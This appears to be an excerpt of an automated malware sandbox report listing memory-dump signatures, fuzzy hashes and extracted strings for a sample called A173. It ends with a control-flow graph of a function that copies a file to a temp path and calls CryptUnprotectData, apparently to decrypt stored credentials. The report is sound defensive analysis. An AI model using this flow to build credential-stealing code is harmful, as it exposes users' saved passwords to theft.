                                                                                  • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                  • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                  • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                  • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                  • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                  • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                  • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                  • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                  • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9ec9d514e2e70023d1070c5594c205ed96daeab2f25a87638ae8d30fbeb0953e
                                                                                  • Instruction ID: 91083d21c9c9c6fec184cc5a12605b68dcb4e35aedaf8e8596f7c419785ad070
                                                                                  • Opcode Fuzzy Hash: 9ec9d514e2e70023d1070c5594c205ed96daeab2f25a87638ae8d30fbeb0953e
                                                                                  • Instruction Fuzzy Hash: 33B01235100000CB8500D7C0DB41410B311DB8011831CC48ED41C8F711C633E813CA00
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2493264460
                                                                                  • Opcode ID: 2fa8d69e3c7c4a5059998e250b45dafeb36c083f69ff863f4c447725bae089a2
                                                                                  • Instruction ID: 49d5ff8b48fc3820dd7be2c66d37b9362789558aee0a1c176e42a87440934fb9
                                                                                  • Opcode Fuzzy Hash: 2fa8d69e3c7c4a5059998e250b45dafeb36c083f69ff863f4c447725bae089a2
                                                                                  • Instruction Fuzzy Hash: 89E128B1704201DFDB09AB28D4956BEB3F7EB95704B20447AD4118B396EB35BE43C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: e28aac48c32ca032eef9d9714c7d81d97c7c25820c54c42f96ca01a3d2d73992
                                                                                  • Instruction ID: 8986fd716f8dc7929113df864df96c80ab545447a19a7c0af1f7e7efd69d5f92
                                                                                  • Opcode Fuzzy Hash: e28aac48c32ca032eef9d9714c7d81d97c7c25820c54c42f96ca01a3d2d73992
                                                                                  • Instruction Fuzzy Hash: 0381B3707042548BD709AF6AD5567BF37BAEB89304F14802AE106CB399DB38BD41DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: 96f37fcf5e6ddf1e282a28d6c35f2a46e8102981ecadf6db6115c3d87938124f
                                                                                  • Instruction ID: d1e34a9d0c2e8287b2c4016c2a7288d7d2e60827878b2b4727d266f85ea345ca
                                                                                  • Opcode Fuzzy Hash: 96f37fcf5e6ddf1e282a28d6c35f2a46e8102981ecadf6db6115c3d87938124f
                                                                                  • Instruction Fuzzy Hash: 675180757001059FC708EF98E455BAA77B7FB89310F24847AE9159B389CB34BD81CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: 1edb0de43edf4d3a74267eb7d3cfa67027b4aa08509adfa099425a3046e0b88f
                                                                                  • Instruction ID: fd2cbbc759bf399c209979489aa411bce24a28366d707e0d0e8099bea2bcb2ed
                                                                                  • Opcode Fuzzy Hash: 1edb0de43edf4d3a74267eb7d3cfa67027b4aa08509adfa099425a3046e0b88f
                                                                                  • Instruction Fuzzy Hash: 65916575B04205CFD724DF8AC484BAAB3B2FB88314F14C569DA068B764D7B5BC86CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: f2158dece94c5bfe5a0f906cff5726adb4a67249ca9c7aaad0a68e7c956b6c64
                                                                                  • Instruction ID: 0310991b9dd6f2e52a0552d594739753dd47ef62fa3ad6cf70720c620f2e6b51
                                                                                  • Opcode Fuzzy Hash: f2158dece94c5bfe5a0f906cff5726adb4a67249ca9c7aaad0a68e7c956b6c64
                                                                                  • Instruction Fuzzy Hash: DF917775A04305CFD724DF99C484BAAB7B2FB88304F14C469DA028B765D7B5BC86CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: a7264a9224f9be2350bec36e76902f490cf2b1caa16a1caf7284d6d954009cca
                                                                                  • Instruction ID: d6f09ec80a451c2a6defaafbe3bbd3be94527305ce9591b2ab2269d310b58796
                                                                                  • Opcode Fuzzy Hash: a7264a9224f9be2350bec36e76902f490cf2b1caa16a1caf7284d6d954009cca
                                                                                  • Instruction Fuzzy Hash: 00616A74B00204CFD714EF69D490BAE77BAEB89305F608169E806CB799DB74BC85CB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: cde77fb3b80055d0ce8e025e286a04f830325bb7ce0dcbd13f17a743612115cc
                                                                                  • Instruction ID: 5c090fb6b893f3bf85a60e0ff93c8c5e20353a4765811c1649fa5d8e12673a82
                                                                                  • Opcode Fuzzy Hash: cde77fb3b80055d0ce8e025e286a04f830325bb7ce0dcbd13f17a743612115cc
                                                                                  • Instruction Fuzzy Hash: EF4118753002149BDB0AAF69D4906AF37E6EBCD300B1442AAE501C7349DF34ED8287F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: 59491c3c808c216569f38cb09c3f07ded6de12ef2653cf662daec1db17543b24
                                                                                  • Instruction ID: 64d624d6825f8714ef1829b8c4e203af4808af2948348d86cec385189faab3cf
                                                                                  • Opcode Fuzzy Hash: 59491c3c808c216569f38cb09c3f07ded6de12ef2653cf662daec1db17543b24
                                                                                  • Instruction Fuzzy Hash: 2031C6753002149BDB09AE6AD4906AF37E6EBCD740B1442A9E50597349CF34ED8287E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: c0bea06214cb9c73301dbc575111b478d24c63d0a90727cc1e8bf158914b5aa6
                                                                                  • Instruction ID: 1979c9b3b1db20c1bbf323ec2578531111987534755b5659f653d9a560ae83dc
                                                                                  • Opcode Fuzzy Hash: c0bea06214cb9c73301dbc575111b478d24c63d0a90727cc1e8bf158914b5aa6
                                                                                  • Instruction Fuzzy Hash: DC417FB5700204AFD708EF69D499AAA77A7FB88311F108079E50587399CB34BD81CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3373200426
                                                                                  • Opcode ID: 7581d6691e795d5f5c92e8d1a2bcbf48bf687186b9dc4118602a3db647f2ed73
                                                                                  • Instruction ID: 6fe4f5da13da86193964fc26e3518326e012bbe2892ec9c5aa3d323278d72978
                                                                                  • Opcode Fuzzy Hash: 7581d6691e795d5f5c92e8d1a2bcbf48bf687186b9dc4118602a3db647f2ed73
                                                                                  • Instruction Fuzzy Hash: 6F71E5F46011149FC705DBB4D992ADF77BBEB8C300F11C06AE6459B345DA34AE8B8BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3373200426
                                                                                  • Opcode ID: f4c028f4d3109a0adc85b958a9ad8fc73f69b23efa0dbc2f9def0c39718258c1
                                                                                  • Instruction ID: 11deb29b3555598482cde85a24cb14c78469b299c00c6688e3e1353d160975f5
                                                                                  • Opcode Fuzzy Hash: f4c028f4d3109a0adc85b958a9ad8fc73f69b23efa0dbc2f9def0c39718258c1
                                                                                  • Instruction Fuzzy Hash: C67102307042059FCB05EF74D4956AEBBB2EF84310B118A29E816DB3A5DB74FD898BD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3373200426
                                                                                  • Opcode ID: 8a624442f3fd92ffd70390be88dc58d4419bb9f0410ef1be333acae7cc354395
                                                                                  • Instruction ID: 896d8d3daff5ae7701cf57eed4254f4835abe871b2825cf1e05a4a6aa1ef1718
                                                                                  • Opcode Fuzzy Hash: 8a624442f3fd92ffd70390be88dc58d4419bb9f0410ef1be333acae7cc354395
                                                                                  • Instruction Fuzzy Hash: D461B0717042058FDB08EF68D491BAEB3F7EB89304F108976E4059B784DB35BD458B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: 44bf1f6b5a39011e5a2a6361f3572d83298fa1cceba697e2de367b689d336f0e
                                                                                  • Instruction ID: 1f2f6f02c1771bcd125da37e1baaf88e3b440f3a15aaeea292e34a9aec4b7da0
                                                                                  • Opcode Fuzzy Hash: 44bf1f6b5a39011e5a2a6361f3572d83298fa1cceba697e2de367b689d336f0e
                                                                                  • Instruction Fuzzy Hash: 2581F475B041049FCB05EFA8D891AAE77BAEF89314F1140BAD8059B395DB34AD42CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: 0054a3fa14840a61965f66cf31c18d35890163cdf60bfac2a48cb487aa4be322
                                                                                  • Instruction ID: bbc81d6849bb643e501ddcc680037843ed14e3423e5fdb735cbfd5a13c65e179
                                                                                  • Opcode Fuzzy Hash: 0054a3fa14840a61965f66cf31c18d35890163cdf60bfac2a48cb487aa4be322
                                                                                  • Instruction Fuzzy Hash: 0F51E335B042049FD714EFA4D890A6F77B6EBC8304B21856AD9069B399DF70FC45CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: e2a1e2a2a7288faa1b15f6689a72796725fb99e73b9903e17ecf7e0378a394aa
                                                                                  • Instruction ID: 21b4aeabdfdb27ce5ca52fde3c52b38e6fae61147b1372ee41cd0b24d23f14a0
                                                                                  • Opcode Fuzzy Hash: e2a1e2a2a7288faa1b15f6689a72796725fb99e73b9903e17ecf7e0378a394aa
                                                                                  • Instruction Fuzzy Hash: CA5194757042049FD714EF64E995A6FB7B6EBC8304B208429D9069B399DB70FC42CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: 813dd0987fd349779bd7dc97d0133db2a313499890f57e197779b216e8ffe36f
                                                                                  • Instruction ID: 5dad3affdf03ba5c053b4d6aac0c3c03d1a1db00dc77532be23c5b3a2291c035
                                                                                  • Opcode Fuzzy Hash: 813dd0987fd349779bd7dc97d0133db2a313499890f57e197779b216e8ffe36f
                                                                                  • Instruction Fuzzy Hash: FE516C763001009FDB0AAF54E855E6A7BB7FB8C314B1580A9E6058F3B6CB36EC51DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: d25f0e4caff6277b0d45e016771f6646ce97afeea3f614190f823fb1d0d85037
                                                                                  • Instruction ID: 489ebc2e0696b1a80e3d99625140bcbd55b7917b0b6d841d9a4efbe07b26fd90
                                                                                  • Opcode Fuzzy Hash: d25f0e4caff6277b0d45e016771f6646ce97afeea3f614190f823fb1d0d85037
                                                                                  • Instruction Fuzzy Hash: 334134357042108FCB05EBA9E9916BF73ABEBC9314F14403BD506C7786DB35AD428BA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: dec91afd8f226ba8d871c51a1979667ee574fe0851625f16a3668243a6197937
                                                                                  • Instruction ID: 3083106ed4ab5fff6f9bdf5c35946359b9ec2d813a6701dafd502c72c658db92
                                                                                  • Opcode Fuzzy Hash: dec91afd8f226ba8d871c51a1979667ee574fe0851625f16a3668243a6197937
                                                                                  • Instruction Fuzzy Hash: 6141C436A00109DFCB04DF68D880AAA77B7EF88310F2085B5E5159B299D770FD86CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: b197299b3367acf381048c0e4e412d9d884bf15967e91f9b988a9fedea1b69c9
                                                                                  • Instruction ID: 8c6ecf8f8d79e7fdb365c4bb21bf5fc2bb439d8984d3cec751710b541b717426
                                                                                  • Opcode Fuzzy Hash: b197299b3367acf381048c0e4e412d9d884bf15967e91f9b988a9fedea1b69c9
                                                                                  • Instruction Fuzzy Hash: EC3128B0705104AFE30AFB74D4D696A77F7EB8D24472180BAE442CB78ADE346D4387A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$S_gi^
                                                                                  • API String ID: 0-1448157964
                                                                                  • Opcode ID: c6ac779c8bd81594f3074d03fc342868e9d84b9274688d43db734b0ae0ec38a2
                                                                                  • Instruction ID: 710afacd7e41560750d0e97d91e3295f041a88da60253e26837a5a01830be6ef
                                                                                  • Opcode Fuzzy Hash: c6ac779c8bd81594f3074d03fc342868e9d84b9274688d43db734b0ae0ec38a2
                                                                                  • Instruction Fuzzy Hash: 5B31CF753042005F9708FB65E8919BF33EBEBCD254310453AE90ACB389DF35AC468BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: 629fe2dee97b8da522f25aa022551e818cfddddf47a313c8297edc4f60ee08bb
                                                                                  • Instruction ID: bb4527d48571b17eeefa5de165d1e3ec3f72a04852aead0c8078ebef4b8ab6ac
                                                                                  • Opcode Fuzzy Hash: 629fe2dee97b8da522f25aa022551e818cfddddf47a313c8297edc4f60ee08bb
                                                                                  • Instruction Fuzzy Hash: 1A41BE70B00204CFD714EF29D094BAA77B6EB89305F6084B9D8068F7A9DB74BC85CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$t=$t=
                                                                                  • API String ID: 0-2360993051
                                                                                  • Opcode ID: b1c7dac4c687cbb879f74dbcaed743a2551173af781da054353bb8a0c35c30c6
                                                                                  • Instruction ID: 3f991eb3e8f55b70349c2c12225894a2420b6736634222d32208a1df6a1c16a8
                                                                                  • Opcode Fuzzy Hash: b1c7dac4c687cbb879f74dbcaed743a2551173af781da054353bb8a0c35c30c6
                                                                                  • Instruction Fuzzy Hash: AC210A767001308BD719EA6AEA1477B7393E7C9714F24807AE809C7789EB35EC4287A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1313151941
                                                                                  • Opcode ID: cc10c3663db2c7b536cbf5524eadfdbe30cc724f742d6d77011ed810d62a710b
                                                                                  • Instruction ID: d87601c7e02ad44731c9c74bd92945e35d640f45edc5f06306e60f4f0f9e728b
                                                                                  • Opcode Fuzzy Hash: cc10c3663db2c7b536cbf5524eadfdbe30cc724f742d6d77011ed810d62a710b
                                                                                  • Instruction Fuzzy Hash: A9015E79700204DBD708EF59E4A57AA73B3FB89345F2080AAE10287399DF34AD81CF52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 123533-12354c call 121d32 3 123552-123568 0->3 4 123a45-123a4b 0->4 5 12356a-123573 call 12319d 3->5 6 12357e-1235c3 call 121000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 1749fa 3->6 9 123578-12357a 5->9 13 123a23-123a2c DeleteFileW call 121011 6->13 14 1235c9-1235e1 call 15ecc6 6->14 9->6 18 123a31-123a36 13->18 19 1235e7-1235ff call 121000 call 1400fa 14->19 20 123a1a-123a1e call 173656 14->20 18->4 21 123a38-123a40 call 12316a 18->21 28 123605 19->28 29 1239de-1239f1 call 13f9a0 lstrlen 19->29 20->13 21->4 30 12360a-123624 call 122117 28->30 35 123a13-123a15 call 121011 29->35 36 1239f3-123a0e call 121960 * 3 29->36 38 1239c4-1239d4 call 1400fa 30->38 39 12362a-12363b 30->39 35->20 36->35 38->30 52 1239da 38->52 42 123641-123651 RtlCompareMemory 39->42 43 123845-12385f CryptUnprotectData 39->43 42->43 47 123657-123659 42->47 43->38 45 123865-12386a 43->45 45->38 49 123870-123886 call 122117 45->49 47->43 51 12365f-123664 47->51 58 123894-1238ab call 122117 49->58 59 123888-12388e 49->59 51->43 55 12366a-12366f 51->55 52->29 55->43 57 123675-1236fb RtlZeroMemory call 121000 55->57 70 123701-123717 call 122117 57->70 71 12383c-123840 57->71 65 1238b9-1238d0 call 122117 58->65 66 1238ad-1238b3 58->66 59->58 61 123890 59->61 61->58 76 1238d2-1238d8 65->76 77 1238de-1238fb call 122117 65->77 66->65 68 1238b5 66->68 68->65 80 123725-12373b call 122117 70->80 81 123719-12371f 70->81 72 1239bf call 121011 71->72 72->38 76->77 79 1238da 76->79 87 123905-12390f 77->87 88 1238fd-1238ff 77->88 79->77 89 123749-123760 call 122117 80->89 90 12373d-123743 80->90 81->80 83 123721 81->83 83->80 92 123911-123913 87->92 93 12391d-123929 lstrlen 87->93 88->87 91 123901 88->91 100 123762-123768 89->100 101 12376e-123787 call 122117 89->101 90->89 94 123745 90->94 91->87 92->93 96 123915-123919 92->96 93->38 97 12392f-123938 lstrlen 93->97 94->89 96->93 97->38 99 12393e-12395d call 121000 97->99 107 123967-1239a1 call 122282 wsprintfA lstrlen 99->107 108 12395f 99->108 100->101 103 12376a 100->103 110 123795-1237a1 lstrlen 101->110 111 123789-12378f 101->111 103->101 115 1239a3-1239af call 12102f 107->115 116 1239b1-1239bd lstrcat 107->116 108->107 110->71 114 1237a7-1237b0 lstrlen 110->114 111->110 112 123791 111->112 112->110 114->71 117 1237b6-1237d5 call 121000 114->117 115->116 116->72 122 1237d7 117->122 123 1237df-123819 call 122282 wsprintfA lstrlen 117->123 122->123 126 12381b-123827 call 12102f 123->126 127 123829-123837 lstrcat call 121011 123->127 126->127 127->71
                                                                                  APIs
                                                                                    • Part of subcall function 00121D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121D4A
                                                                                    • Part of subcall function 00121D32: CloseHandle.KERNEL32(00000000), ref: 00121D57
                                                                                  • GetTempPathW.KERNEL32(00000104,00000000), ref: 00123594
                                                                                  • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 0012359E
